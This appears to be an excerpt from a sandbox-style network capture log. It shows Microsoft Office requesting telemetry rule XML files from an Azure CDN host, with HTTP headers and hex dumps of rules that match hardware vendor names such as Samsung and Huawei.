                                                                                2024-10-04 09:33:54 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                26192.168.2.55540513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:54 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:54 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:54 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 468
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                ETag: "0x8DC582B9C8E04C8"
                                                                                x-ms-request-id: 09e6f7ee-001e-0034-548c-15dd04000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093354Z-15767c5fc55dtdv4d4saq7t47n0000000c0000000000asrd
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:54 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                27192.168.2.55540413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:54 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:54 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:54 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 404
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                ETag: "0x8DC582B9E8EE0F3"
                                                                                x-ms-request-id: 4f10c824-e01e-0085-1c8c-15c311000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093354Z-15767c5fc55jdxmppy6cmd24bn00000004eg00000000a09m
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:54 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                28192.168.2.55540613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:54 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:54 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:54 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 428
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                ETag: "0x8DC582BAC4F34CA"
                                                                                x-ms-request-id: 82f8b22c-c01e-0014-5a8c-15a6a3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093354Z-15767c5fc55rv8zjq9dg0musxg0000000c90000000008e15
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:54 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                29192.168.2.55541013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:55 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:55 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                ETag: "0x8DC582BB32BB5CB"
                                                                                x-ms-request-id: c2ca9d4d-801e-0035-458c-15752a000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093355Z-15767c5fc55fdfx81a30vtr1fw0000000cm0000000009uh4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                30192.168.2.55541113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:55 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:55 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 494
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                ETag: "0x8DC582BB8972972"
                                                                                x-ms-request-id: 831ef799-b01e-0098-7b8c-15cead000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093355Z-15767c5fc554w2fgapsyvy8ua00000000bu0000000006w6m
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:55 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                31192.168.2.55540713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:55 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:55 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 499
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                ETag: "0x8DC582B98CEC9F6"
                                                                                x-ms-request-id: 30fd46b0-d01e-00a1-368c-1535b1000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093355Z-15767c5fc55rg5b7sh1vuv8t7n0000000cm0000000009bv2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:55 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                32192.168.2.55540813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:55 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:55 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 415
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                ETag: "0x8DC582B988EBD12"
                                                                                x-ms-request-id: 6a901ce3-301e-005d-708c-15e448000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093355Z-15767c5fc55dtdv4d4saq7t47n0000000c5g00000000326x
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:55 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                33192.168.2.55540913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:55 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:55 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:55 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 471
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                ETag: "0x8DC582BB5815C4C"
                                                                                x-ms-request-id: 75493038-e01e-00aa-508c-15ceda000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093355Z-15767c5fc55ncqdn59ub6rndq00000000c10000000005634
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:55 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                34192.168.2.55541313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:56 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:56 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:56 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 427
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                ETag: "0x8DC582BA909FA21"
                                                                                x-ms-request-id: eccf174e-001e-0079-238c-1512e8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093356Z-15767c5fc55qdcd62bsn50hd6s0000000c7g000000000hzy
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:56 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                35192.168.2.55541513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:56 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:56 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:56 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 486
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                ETag: "0x8DC582B92FCB436"
                                                                                x-ms-request-id: 76615707-c01e-0082-6a8c-15af72000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093356Z-15767c5fc55qkvj6n60pxm9mbw00000001dg000000008kcr
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:56 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                36192.168.2.55541413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:56 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:56 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:56 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                ETag: "0x8DC582B9D43097E"
                                                                                x-ms-request-id: 4b0a3852-c01e-00ad-3b8c-15a2b9000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093356Z-15767c5fc55tsfp92w7yna557w0000000cd0000000002gk5
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
